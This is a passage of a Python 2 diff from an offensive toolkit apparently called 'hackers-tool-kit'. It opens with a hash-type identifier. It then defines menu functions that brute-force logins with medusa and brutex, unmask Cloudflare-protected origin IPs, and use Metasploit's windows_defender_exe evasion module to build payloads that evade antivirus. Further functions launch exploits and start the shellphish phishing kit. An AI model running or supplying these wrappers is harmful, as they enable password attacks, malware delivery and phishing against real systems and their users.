len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m 